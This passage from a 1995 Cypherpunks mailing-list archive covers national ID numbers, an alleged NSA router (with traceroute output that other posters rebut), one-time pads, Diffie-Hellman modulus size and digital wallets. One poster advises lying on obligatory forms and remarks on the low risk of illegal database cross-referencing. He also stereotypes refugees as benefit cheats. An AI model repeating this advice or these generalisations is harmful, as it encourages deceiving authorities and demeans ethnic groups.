on this number, usually as a first key field. Surprise immigrants get a
preliminary number at the border (other format) and a genuine one if
later accepted. Without a Person Number you would be practically
helpless: no schooling, no drivers licence, no 'social benefits',
no bank account, no job (if your employer intends to do it legally
and cut off taxes). The only marginally possible way to get around
this is to use the Person Number of another person (forging a Swedish
Approved ID is quite a task, though, and it's not very kind to that
other person). Most Government databases are open to the public, so
the credit tracking agencies don't have to work very hard regarding
persons (sometimes a bit more with corporate entities; those can be
registered to fall guys - not hard to find in a jurisdiction with
nice jails and short sentences). 

Now, there are laws against cross-referencing various databases
without the approval of the Data Inspection, which often says no.
But if you do it illegaly, there is very little risk of detection.
It looks like the Approved ID will be a smart-card with a signing
mechanism (probably escrowed), naturally linked to the Person Number,
real soon now, at least before the mythical y.2000 . Links to physical
characteristics (retina?) are not (openly) discussed yet but may
eventually come into play.

I think there's not much to win (and a lot of conveniency to loose)
in trying to hide from this System. A friend of mine, and his wife,
had their baby born at home and hid it from the System for several
years (loosing good money from the Social Security system in that
process - in Sweden all people get many 'benefits'= transferred tax
money, regardless of income) but eventually they registered the child,
of course. It was a mere gesture.

Solution:

1) Don't fight the inevitable, like Don Quixote (sp?) did. The
   trick is to keep one's database entries as unsuspicious as
   possible. Pay politically correct items and services with
   a credit card, but use cash in transfers that the current
   (and possibly a coming, more Orwellian) regime might consider
   to be disloyal. Don't refuse to fill in forms or answer
   questions which are more or less obligatory or that might give
   you some benefits - just lie if necessary to create a normal,
   inconspicuous profile.

2) Prepare for Crypto Anarchy. Create untrackable net aliases for
   future use. Keep informed of all the tricks to bypass coming
   futile attempts to link net pseudonyms to Person Numbers (or
   physical characteristics). Enjoy (and help create and protect)
   the virtual sanctuary with digital mixes and anonymous http
   proxies (and DC-nets or something better eventually).

Mats
   
   









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Sun, 5 Nov 1995 20:13:30 +0800
To: hua@xenon.chromatic.com (Ernest Hua)
Subject: Re: lp (134.222.35.2)?
In-Reply-To: <199511050653.WAA17662@xenon.chromatic.com>
Message-ID: <9511051204.AA10691@all.net>
MIME-Version: 1.0
Content-Type: text


...
> It would be fun (perhaps horrible) to see what the NSA does the first
> time Isreal or France set up their own high capacity long distance to
> other friendly/unfriendly countries (thus bypassing the US completely).
> Second, let France or some other country set up major Internet routing
> clearinghouses which advertise secure routes to other nations (not US).

I hope nobody would believe that either France or Israel would provide
secure communications.  France has a global reputation for industrial
espionage, and Israel almost certainly listens to all the traffic it
can.  That's probably true of most industrialized nations in today's world.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sun, 5 Nov 1995 14:27:17 +0800
To: cypherpunks@toad.com
Subject: lp (134.222.35.2)?
Message-ID: <199511050620.HAA14046@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


I'm sure some of you will have seen this, so sorry to toss logs on the
listburn fire; still, it seemed worth reposting to CP--no, it's not
entirely crypto-related, but nor is it a completely vague allegation.

>From GovAccess.183.snoops:

>  The following is the transcript of an actual communications trace that a
>  friend ran, while I was sitting next to him, watching -- reprinted here
>  with his permission.
>  
>  He did a "traceroute" of two messages that he sent from his machine in
>  Switzerland (he'd telneted into it while we were at a computer conference
>  in California).
>  
>  Traceroute automatically reports each Internet node through which a message
>  passes, as it proceeds from origin to destination.
>  
>  He did two traceroutes.  The first was from Switzerland to an addressee at
>  Netcom in San Jose, California.  The second was from Switzerland to an
>  addressee in Israel.
>  
>  
>  Date: Fri, 21 Apr 95 02:54:58 +0200
>  From: kelvin@fourmilab.ch (John Walker)
>  To: jwarren@well.com
>  Subject: Traceroute
>  
>  > /usr2/kelvin> traceroute netcom11.netcom.com
>  traceroute to netcom11.netcom.com (192.100.81.121), 30 hops max, 40
byte packets
>   1  eunet-router (193.8.230.64)  2 ms  2 ms  2 ms
>   2  146.228.231.1 (146.228.231.1)  326 ms  345 ms  307 ms
>   3  Bern5.CH.EU.NET (146.228.14.5)  447 ms  408 ms  364 ms
>   4  146.228.107.1 (146.228.107.1)  127 ms  37 ms  36 ms
>   5  Zuerich1.CH.EU.NET (146.228.10.80)  37 ms  38 ms  175 ms
>   6   (134.222.9.1)  65 ms  109 ms  252 ms
>   7  lp (134.222.35.2)  196 ms  179 ms  405 ms
>   8  Vienna1.VA.ALTER.NET (137.39.11.1)  191 ms  179 ms  313 ms
>   9  fddi.mae-east.netcom.net (192.41.177.210)  336 ms  204 ms  303 ms
>  10  t3-2.dc-gw4-2.netcom.net (163.179.220.181)  182 ms  251 ms  187 ms
>  11  t3-2.chw-il-gw1.netcom.net (163.179.220.186)  305 ms  586 ms  518 ms
>  12  t3-2.scl-gw1.netcom.net (163.179.220.190)  537 ms  693 ms  797 ms
>  13  t3-1.netcomgw.netcom.net (163.179.220.193)  698 ms  549 ms  754 ms
>  14  netcom11.netcom.com (192.100.81.121)  890 ms  1922 ms  1696 ms
>  
>  > /usr2/kelvin> traceroute jerusalem1.datasrv.co.il
>  traceroute to jerusalem1.datasrv.co.il (192.114.21.101), 30 hops max, 40
>  byte packets
>   1  eunet-router (193.8.230.64)  2 ms  3 ms  2 ms
>   2  146.228.231.1 (146.228.231.1)  933 ms  853 ms  874 ms
>   3  Bern5.CH.EU.NET (146.228.14.5)  1040 ms  450 ms  525 ms
>   4  146.228.107.1 (146.228.107.1)  453 ms  424 ms  188 ms
>   5  Zuerich1.CH.EU.NET (146.228.10.80)  64 ms  61 ms  47 ms
>   6   (134.222.9.1)  80 ms  312 ms  84 ms
>   7  lp (134.222.35.2)  270 ms  400 ms  216 ms
>   8  Vienna2.VA.ALTER.NET (137.39.11.2)  660 ms  1509 ms  886 ms
>   9  dataserv-gw.ALTER.NET (137.39.155.38)  1829 ms  1094 ms  1306 ms
>  10  orion.datasrv.co.il (192.114.20.22)  1756 ms  1280 ms  1309 ms
>  11  ...
>  
>  
>  Notice that both messages went through an unnamed site -- 134.222.9.1 and
>  then a strangely-named site, "lp (134.222.35.2)" -- then through the same
>  Vienna, Virginia (USA) site ... and thereafter, on to their destination.
>  I.e., the second message went through Virginia to get from Switzerland to
>  Israel.
>  
>  The whois servers at the InterNIC and at nic.ddn.mil for MILNET Information
>  report, ``No match for "134.222.9.1". '' and `` No match for
>  "134.222.35.2".''
>  
>  Now let me see ... which spy agencies are located in or near Virginia?
>  
>  --jim




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Shantz <bshantz@nwlink.com>
Date: Mon, 6 Nov 1995 01:08:48 +0800
To: cypherpunks@toad.com
Subject: Tim, Perry, it's gettin' real old.
Message-ID: <9511051657.AA22854@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Tim May, Perry Metzger, on the topic of off topic things, I think this
little flame war of yours can be taken offline.  It's getting real old
watching two grown men fling mud at each other.  That's why I don't watch
Presidential debates anymore.  (Although I did enjoy Admiral Stockdale
turning off his hearing aid when Quayle and Gore were bitching at each other.)

This is the last I'll say on the subject.

The wonders of freedom allow me to delete any threads I don't want to read.
And I exercise that right frequently.

Grow up, boys.

Brad





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SINCLAIR  DOUGLAS N <sinclai@ecf.toronto.edu>
Date: Sun, 5 Nov 1995 22:58:37 +0800
To: stewarts@ix.netcom.com (Bill Stewart)
Subject: Re: Video as a source of randomness
In-Reply-To: <199511042352.PAA07530@ix4.ix.netcom.com>
Message-ID: <95Nov5.095208edt.917@cannon.ecf.toronto.edu>
MIME-Version: 1.0
Content-Type: text/plain


The cheapest strong source of video noise that I can think of would be
a small fan with a ribbon tied to the grille.  As long as it's in a
turbulent flow regime, you'll get very random numbers at a fast
rate.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 6 Nov 1995 02:01:20 +0800
To: cypherpunks@toad.com
Subject: "The Policeman Inside"
Message-ID: <acc2319202021004e8ac@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:35 PM 11/5/95, Mats Bergstrom wrote:

>Well, also in Sweden, but this is merely against tax money transfered to
>the 'less fortunate' (or 'lazy', as you sometimes call them) and is very
>little, if at all, connected to anti-surveillance. Cross-referencing
>various databases would actually be good for catching those who receive,
>for example, unemploment money while actually working full time (especially
>common amongst Mediterranian and Middle East 'political' refugees - many
>of whom like to come here and work for a handful of years, sometimes adding
>a decade to their actual age so they can go home to a warm climate at 55
>to live as kings on their Swedish pensions). Isn't this a dilemma, also at
>your home turf? FINCEN efficiency might save some of your tax dollars.
                 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Mats' point is an important issue to think about. The "conservative" who
wants to get the bums off welfare and keep his hard-earned kroners or
francs may embrace a FinCEN-type computerized police state. In a system of
extensive transfer payments, such "person number" tracking is needed to
ensure that Citizen Units do not make double claims, do not retire before
they have made their full productive contribution to the welfare of the
herd, and so on.

A "libertarian" would argue that when economic interactions are uncoerced,
when there are few if any lay-abouts collecting food stamps, welfare, AFDC,
WICC, generous pensions paid by taxpayers, etc., then the "need" for
Citizen Unit identification vanishes.

This actually has some crypto relevance, besides the obvious crypto anarchy
connections. Nameley, parallels with "offline" and "online" clearing.

A system in which pieces of paper and various promissory notes are
transferred around as money, with later (offline) clearing, tends to
require True Names. This so that defaulting parties can be tracked down and
collected from. (And of course there are also tax issues, and regulatory
issues, but I'm concentrating on the offline or deferred clearing issues
that tend to make True Names and physical identities more important.)

By contrast, a cash economy--online or immediate clearing--tends to not
require identification. "Cash and carry," which has worked for millenia in
diverse cultures which have no forms of identification. One pays in corn,
or beads, or gold, and that's that.  (There are, as Futplex noted I like to
say, "lots of issues." We could discuss exceptions to this, such as
contracts, age credentials, etc. But, generally, cash transactions tend to
produce no compelling need for identification. This is the norm in most
retail transactions, unless "checks" or other forms of deferred clearing
payment are tendered.)

The modern "identity state" is becoming consumed with the notion that
everyone needs an index number. Not necessarily because the police want to
compile dossiers on them (though this is a factor), but because of the
focus on rules and regulations which affect _monetary flows based on
identity_.

In the U.S. for example, one used to just be able to pay someone to cut
one's lawn in cash (or check, if he trusted you, blah blah) or babysit
one's children. Now, under new crackdowns on social security laws, income
tax estimated payment laws, hiring of undocumented workers laws, etc., this
is technically no longer possible. One must, above some tiny threshold of
payments, file various tax and social security forms, and take steps to
ensure the worker is properly documented (*)

(* Most white people in America have little "proof" that they are proper
Citizen Units. This leads to uncomfortable situations where only brown- and
yellow-skinned persons are asked to prove their identities and their
Citizen Unit or Resident Unit status.)

There is strong pressure on several fronts to establish a "National
Identification Card." Others are opposed.

My point, originally, to Rich Graves' mention of Chris Hibbert's excellent
FAQ on Social Security Numbers and person numbers, is that it is no longer
relevant to fight against a "single index number." Modern data base methods
are so well-suited to cross-indexing that it hardly matters whether there's
a single point of entry to the data base or not.

THE KEY POINT IS THIS: Are voluntary economic transactions between persons
to be subject to approval and regulation by the State? If babysitting and
lawnmowing, not to mention hiring someone to write some C code, requires
submitting tax and Social Security forms, requires checking the J-1 vs.
Permanent Resident vs. Approved Citizen Unit status, then the die is cast.

Ordinarily, or in earlier years, these rules might have been dismissed as
trivial or as mostly ignorable. After all, so long as one is not planning
to become Attorney General, who cares whether a housekeeper was "legal" or
not? Who cares whether the detailed Social Security, IRS, and Immigration
Control forms were filled out properly, or at all?

Well, the State is becoming more efficient in tracking such things, and tax
penalties are increasing. Further, bounties are being paid to those who
inform on "tax cheats." Computerized records are being used to spot those
with "apparent incomes" (= lifestyles) inconsistent with their tax filing
status.

Sure, part of this is to catch "double dippers," such as those collecting
unemployment, welfare, AFDC, disability benefits while also doing work on
the side. (There's a whole issue here of the laws about welfare recipients
not being allowed to work, which I won't get into.)

But the danger, and something that should inform our Cypherpunks
discussions, is that these laws which are tied to one's status as a Person
Unit in the system, inevitably require an extensive "identity tracking"
regimen.

The libertarian and anarcho-capitalist solution is not to increase the
power of the surveillance state to detect fraud and non-compliance, but to
roll things back to a more even keel.

Even if one believes taxes are "the price paid for civilization," there are
superior alternatives to the current system. (My current favorite is:
mandatory slavery for X days per year, regardless of age or ability.
Instead of taxes, everyone works one day in five, or 2 months out of the
year, etc., for the herd. Building roads, picking up trash, administering
computers, etc. There are "lots of issues," but even I agree this list is
not the best place to discuss it; I mention it in passing.)

In closing, we must beware "the policeman inside," to use the William
Burroughs term. A surveillance state that arises because modern computers
and data bases allow all economic transactions to be monitored, taxed, and
approved or disapproved is a horror we should fight with all of our
resources. Whether right-, left-, or libertarian-leaning, the implications
of this state power to control our lives are horrible.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: amp <Alan.Pugh@internetMCI.COM>
Date: Sat, 4 Nov 1995 23:06:29 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: using pgp to make an otp
Message-ID: <01HX8P5B3MCI91XT4Q@MAIL-CLUSTER.PCY.MCI.NET>
MIME-Version: 1.0
Content-Type: text/plain


-- [ From: amp * EMC.Ver #2.3 ] --

-----BEGIN PGP SIGNED MESSAGE-----

greetings c-punks,

i may have posted this at some time in the past, as i have asked it
elsewhere and gotten different responses. i'm interested in that the
folx here think about it though, so here it is...

i want a source of data for use as a otp. i don't want to have to
hook up any external devices to my pc to do it. (although some of the
methods mentioned in the past few days are quite interesting.) 

i'd like to know if there was a reason not to use the output of pgp
to do it. i've been playing with the following method. i take a file
and encrypt it to a key with the '-a' flag on. this generates an
ascii file that is easily editable using simple, standard rexx calls.
i strip the first 20 or so lines and the last 20 or so lines
and put the resulting file aside. then i perform the same operation
again and append the file to the previous result. i repeat until the
file is sufficiently large for my purposes and then give the
resulting file to the person(s) i want to have it. 

i still need a program to make use of the otp i've produced, but
havent gotten that far as this is still pretty much a thought
experiment and something for me to waste time with. once i'm ready to
make use of it i'll either find a program or attempt to write
something to use to make the data i've generated useful.

i would think that the output of pgp should be pretty darn random. if
it isn't, then it's usefulness is less than its reputation imo. as
you can tell if you've read this far, i'm not a cryptographer. i just
like the stuff and am working to become more proficient in its use as
i think it is important if we are to maintain our privacy in an
increasingly digital world.

what are the holes in this? why would it be unadvisable to do it?
otoh, would it be a good basis for a otp?

amp
<0003701548@mcimail.com>
<alan.pugh@internetmci.com>
PGP Key = 4A2683C1
November 5, 1995   1:16
 



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMJxWxigP1O9KJoPBAQFzxggAmRyJlfZVt8s6shqkkvFxmSpJdyZvaSEw
O/hQEb5fJK4FuxZaIyw2Enp4Ca1/vGeEaw1Zc8JM2wSk2Km4Vjl7zlJjmIpOJ6Nw
QAJfpHwwz77NMpMiWLj/m9nwkBeQs3IPcgDywIBu2Hfw6o79bndUS+GbEoG0f/+L
jH7y0bZ+pNX/fLYaPZRnPPGVDqPn7VkfuvByT5Op5rNbHU56kSneW3bC79M1SO3K
sYXpdGYU6mWC5xbYq1eQI9sCpkdB4pftMC3cizvKdueXGTMnXbngwBnu+Hk7GONz
KOx9x6rWPJ/NBTJONiz4Scg28XelnziBP5OYXSWzBNFBoauZpcK0MQ==
=8lYe
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shields@tembel.org (Michael Shields)
Date: Sun, 5 Nov 1995 19:17:23 +0800
To: cypherpunks@toad.com
Subject: Re: lp (134.222.35.2)?
In-Reply-To: <199511050620.HAA14046@utopia.hacktic.nl>
Message-ID: <47i5na$24d@yage.tembel.org>
MIME-Version: 1.0
Content-Type: text/plain


In article <199511050620.HAA14046@utopia.hacktic.nl>,
Anonymous <nobody@REPLAY.COM> wrote:
> I'm sure some of you will have seen this, so sorry to toss logs on the
> listburn fire; still, it seemed worth reposting to CP--no, it's not
> entirely crypto-related, but nor is it a completely vague allegation.

It's specious.

> >  Notice that both messages went through an unnamed site -- 134.222.9.1 and
> >  then a strangely-named site, "lp (134.222.35.2)"

Belonging to the EUnet backbone, apparently run by people who don't care
much about DNS.

Actually, I resolve 134.222.9.1 as `Amsterdam4.NL.EU.net'.  I can ping
it, but not 134.222.35.2.  134.222.35/24 also does not appear in the
RIPE registry.  I'm going to conclude that it was a temporary thing EUnet
set up for some reason.  It seems to have been replaced by amsterdam6,
134.222.228.13.

> > -- then through the same
> >  Vienna, Virginia (USA) site ...

...a major router at a major interconnect run by UUNET, a major provider.
datasrv appaently contracted with UUNET for traffic.  Naturally it would
go through their network, which is centered in the US.

Why isn't the NSA tapping biu.ac.il, a central Israeli news site?
Routing from Net99 to them is through IBM.

> >  The whois servers at the InterNIC and at nic.ddn.mil for MILNET Information
> >  report, ``No match for "134.222.9.1". '' and `` No match for
> >  "134.222.35.2".''

They are not comprehensive.  You need to look up the network.

This is silly.  If the NSA were monitoring traffic with the consent of
EUnet and UUNET (and note that EUnet is owned by UUNET rival PSI), they
wouldn't need to play these routing games; they'd just eavesdrop at an
interconnect or on the leased lines leading into it, run a rough filter
over it to cut down volume, and tunnel the traffic home through other
channels (probably satellite).  And if they were monitoring without the
consent of UUNET and EUnet, they still wouldn't play these games because
the providers would be upset about the unexpected load on the expensive
and overloaded transatlantic pipes.

Finally, we all know how easy sniffing is at the local (LAN, ISP LAN,
and especially telco) level.  And we know that end-to-end encryption
is the way to go.  So what would we have learned if we knew the NSA
was eavesdropping?

Just *assume* the NSA is out to get you, design systems that resist
attack, and then you can stop caring about whether you're the target.

And tell your vendor you want Kerberos or IPSEC.
-- 
Shields.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 6 Nov 1995 00:14:44 +0800
To: "William Allen Simpson" <bsimpson@morningstar.com>
Subject: Re: Photuris Primality verification needed
In-Reply-To: <1973.bsimpson@morningstar.com>
Message-ID: <199511051607.LAA08575@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"William Allen Simpson" writes:
> Folks, I was somewhat disappointed in the response to our previous
> requests for verification of the strength of the prime moduli.
> 
> Recently, someone asked for a smaller prime of only 512-bits for speed.
> This is more than enough for the strength of keys needed for DES, 3DES,
> MD5 and SHA.  Perhaps this would be easier to have more complete and
> robust verification as well.

I think that this is a very large mistake. Allow me to explain why.

La Macchia (sp?) and Odlyzko (sp?) have a very nice result which shows
that once you've done enough precalculation on a particular modulus,
you can break any subsequent Diffie-Hellman operation performed on
that modulus with (for our purposes) no effort. 512 bits is, from what
I can tell, not far out of the realm of possibility for what someone
could try to crack with current machines given enough effort.

[Sorry about the spelling. I'm tired, and don't have time to look up
your names. I know that Brian at least reads this list and I'm sorry
about likely misspelling your name.]

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 6 Nov 1995 00:19:20 +0800
To: James Black <black@eng.usf.edu>
Subject: Re: using PGP only for digital signatures
In-Reply-To: <Pine.SUN.3.91.951104155911.2413A-100000@fourier>
Message-ID: <199511051611.LAA08586@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



James Black writes:
>   I am in a discussion (during the week) with a system administrator 
> about seeing if we can just make PGP publically available to everyone, 
> but now the discussion seems to be to just allow PGP to do digital 
> signatures, and I don't think that is the best choice, then.  They are 
> not against PGP being used, but there are legal issues as to whether they 
> can offer it to everyone, as some students are international students, 
> and are not allowed to use the version for the US, or so I have been 
> informed, so now I need to see if we can have the international version, 
> so these students can use it. :(

Actually, nothing in the ITAR says foreigners can't USE the
U.S. version of PGP, just that you can't give them the software.

However, I think it is a bad idea to make PGP available on a multiuser
computer. It encourages a very, very bad habit -- that of using PGP on
a multiuser computer....

> What they are trying to do is make certain that no 
> one can send a message to anyone, claim to be in the faculty, and cause 
> problems that way.

But since you are using this software on a multiuser computer over
likely insecure lines, or, even worse, over an insecure LAN, all you
are going to do is make things even stickier when someone steals a key
and starts pretending to be some faculty member anyway.

Don't use public key software on untrusted hardware over insecure
links. Its a BAD BAD BAD thing.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 6 Nov 1995 00:26:48 +0800
To: cypherpunks@toad.com
Subject: Re: consumer products that make nice sources
In-Reply-To: <v02120d00acc195427273@[205.164.159.32]>
Message-ID: <199511051620.LAA08607@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Lots of people are discussing all sorts of weird souces of radioactive
material to use in a detector for an RNG.

None of this is necessary. Scientific supply houses will happily sell
you small calibrated sources for use in your lab, classroom, or in our
case, machine room (:-).  There is no need to find objects to
dismantle or silly dangerous radioactive sources. You can get a source
that produces exactly as much activity as you need very cheaply.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 6 Nov 1995 00:46:11 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Credentials Without Identity
In-Reply-To: <acc154b62202100420bc@[205.199.118.202]>
Message-ID: <199511051639.LAA08639@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Timothy C. May writes:
> (And as a measure of how apologetic some folks are getting about discussing
> anything not on Perry's List of Approved Topics,
[....]
> In fact, the issue of credentials
> and identity is NOT off-topic, not even semi-off-topic. It is central to
> the themes of our list. I urge all to read Chaum's seminal work on
> "credentials without identity.")

I've repeatedly stated, Tim, that my problem is with junk, not with
stuff on list charter. You can claim anything you like about my
statements, but it won't be true. Any statement to the effect that I'm
against discussion of anonymous credentials is a "big lie" -- an
attempt to distort what I have said by being sufficiently outrageous.

Repeating, I am troubled by people posting stuff about whether
roadways should be privatized -- I am perfectly happy with discussion
of Chaumian anonymous credentials. My problem is with people who think
this is Libernet, or Waconet, or Fosternet, or IBM MicroKernel net, or
Internet Investing Net, or what have you. I also find the beating of
dead horses unfortunate, but I never complain about it since its
usually technically on topic.

Now, Tim, if you feel people should be able to post their questions
about system administration of Unix boxes here, as in fact happened
only last week, please speak up.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 6 Nov 1995 00:55:55 +0800
To: shamrock@netcom.com (Lucky Green)
Subject: Re: Telephone switch capacity -Reply
In-Reply-To: <v02120d02acc1d4859dfc@[192.0.2.1]>
Message-ID: <199511051645.LAA08650@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Lucky Green writes:
> One more time. Despite what you read in the papers, despite what most
> people - even in the legal profession - believe, telephone wiretaps do
> _not_ require a court order. They haven't required a court order in over a
> year.

They never required a conventional court order. This was not new. They
always had a national security escape clause. However, at least they
cannot be used in court unless there was a court order involved, and
the process of getting "legitimate" authorization to, say, bug the
embassy phones, does require that certain forms be followed.

The real problem, IMHO, is that people can avoid the formalities
entirely and simply unlawfully wiretap, and that tracing such attempts
is hard.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 6 Nov 1995 01:21:03 +0800
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Re: using pgp to make an otp
In-Reply-To: <Pine.SOL.3.91.951104211722.6970F-100000@chivalry>
Message-ID: <199511051710.MAA08683@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Simon Spero writes:
> On the subject of reused one-time-pads: What are the attacks that become 
> available if a pad is used two times. The ones I can think of are:

I will point out that the NSA's VENONA project, which among other
things lead indirectly to the execution of the Rosenbergs, got its
only break from the two time use of one time pads by the Soviet
spies. I can't guess all the techniques they used, but obviously there
are enough things you can do to make it dangerous.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 6 Nov 1995 01:22:05 +0800
To: cypherpunks@toad.com
Subject: Re: lp (134.222.35.2)?
In-Reply-To: <199511050620.HAA14046@utopia.hacktic.nl>
Message-ID: <199511051713.MAA08691@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Anonymous writes:
> >  Notice that both messages went through an unnamed site -- 134.222.9.1 and
> >  then a strangely-named site, "lp (134.222.35.2)"
[...]
> >  Now let me see ... which spy agencies are located in or near Virginia?

The existance of MAE East in Virginia is far more significant.

I'm sure the spooks are spying, but they are likely just tapping
lines. Machines that don't have proper reverse maps show up every day
in large networks and aren't something to worry about. Your posting is
based on the premise that this unnamed machine is of significance --
and it almost certainly isn't of any significance.

Quit looking for the spooks where they aren't. You should always
assume your line is being tapped if you are saying something you don't
want heard, anway.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Harry S. Hawk" <habs@warwick.com>
Date: Mon, 6 Nov 1995 01:52:10 +0800
To: cypherpunks@toad.com (Good Guys)
Subject: Public Reviews of CheckFree Wallet system?
Message-ID: <199511051743.MAA11416@cmyk.warwick.com>
MIME-Version: 1.0
Content-Type: text/plain


Here is some more information on the Checkfree Wallet (tm) system. I've
learn about it from some reporting I've been doing on it..

1) Has there been any public review of this product?

Here is the basic run down

It uses a 768-bit key. They claim it is not escrow-ed with the US
government. It is export able to most countries except for Sudan, Cuba,
North Korea, Syria, Libya, Iraq ot Iran.

It encrypts limited bits of information (like Credit Card Numbers)
which is why they claim it was able to get export approval.

User configures the Wallet(tm) by downloading and installing and
configuring it. It works with Proxy servers which I have
successfully tested.

It generates a public and private key pair using RSA technology.

It keeps the payer anonymous to the merchant via the internet. Merchants can learn the payer's name out of band (e.g., by phone).

No credit card info is stored on a merchant's site.

Payment is encrypted and signed buy the payer and sent to the merchant
who add's there version of the transaction and their signature. It is
forwarded to check free who then decrypt, compare the payers' and
merchant's view of the transaction and if they agree process it.

It use is very very quick and easy. It auto configures itself to
Netscape. Payment information is sent to the Wallet (TM) from the
merchant in a Mime segment, which triggers a launch of the Wallet, the
payer binds in their credit card data (all ready at Checkfree (at
installation) e.g., which card to use. Then the whole thing is sent to
the merchant then the onto Checkfree for processing as indicated
above.

I was very impressed with the software and it's easy of use. Currently
only works on Windows but soon on the Mac..

/hawk

  --
                Harry Hawk
                Manager of Interactive Communications
                Warwick Baker & Fiore
                212 941 4438
                habs@warwick.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 6 Nov 1995 02:31:40 +0800
To: cypherpunks@toad.com
Subject: Re: lp (134.222.35.2)?
Message-ID: <199511051821.NAA20156@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Responding to msg by perry@piermont.com ("Perry E. Metzger") on 
Sun, 05 Nov 12:13 PM

>Quit looking for the spooks where they aren't. You 
>should always  assume your line is being tapped if you 
>are saying something you don't  want heard, anway.


   True, it's not Smokey behind the billboard, blinked at you
   by oncoming headlights, it's the sensors in the roadbed
   that reads your tag -- when it leaves your home-ain, then
   at the remailer donkeystops, then at your recreational
   stash-house, at the pedo-filmery, at the Semtex-Pantex
   workhide, at the digi-wallet-copyfast, right into
   ananonymous Ken-Barbie's e-slot.

   TLA-Smokey is friendly, maybe intra-humanly let you off
   with a warning, not the anonymous high-techery, it responds
   only to its friend, the tag -- tracing, storing, mutating 
the
   whinefleshers, 0's by 1's.

   That's the how, maybe, but for who or what or why?

   Or is it just machines feeding machines incomprehensibles?
















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mats Bergstrom <asgaard@sos.sll.se>
Date: Sun, 5 Nov 1995 20:47:28 +0800
To: cypherpunks@toad.com
Subject: Re: Credentials Without Identity
In-Reply-To: <acc1ae3828021004292e@[205.199.118.202]>
Message-ID: <Pine.HPP.3.91.951105123707.4854A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


(PRIVATE mail, taken from the cp-list)

I choose to make these 'off-topic' comments off the record:
 
(By the way, please keep on 'crypto-moderating' the list
 your way; it makes much more sense - and is much more
 effective! - than Perry's.)
 
> Fortunately, I have heard there is a "right wing" backlash growing in some
> of the Scandinavian countries, especially Norway and Denmark. ("Right wing"
> is what the press calls it...I hope it's really "anti-left wing,"
> anti-cradle-to-grave-socialism.)

Well, also in Sweden, but this is merely against tax money transfered to
the 'less fortunate' (or 'lazy', as you sometimes call them) and is very
little, if at all, connected to anti-surveillance. Cross-referencing
various databases would actually be good for catching those who receive,
for example, unemploment money while actually working full time (especially
common amongst Mediterranian and Middle East 'political' refugees - many
of whom like to come here and work for a handful of years, sometimes adding
a decade to their actual age so they can go home to a warm climate at 55
to live as kings on their Swedish pensions). Isn't this a dilemma, also at
your home turf? FINCEN efficiency might save some of your tax dollars.

> To my surprise, several people on this list have expressed support for the
> need for so-called "data privacy laws." I look at it this way: if I put

I completely agree with you - actually, I think I took over some arguments
from you on this subject long ago - that these laws are bullshit.

> lists. Ironically, the Cypherpunks mailing list might be illegal in the
> U.K. unless the legal forms were properly filled out, the fees paid, the
> parties notified on a regular basis of information about them, etc. And our

This applies very much so in Sweden too. It *is* illegal to maintain any
database with 'information on persons' (like their email addresses) without
approval from the Data Inspection. But it's an open secret that this law
is broken on a massive front and no bureaucrat is really trying to uphold it.

> "Disneyland with a death penalty"

Yes, we live in interesting times.


Mats





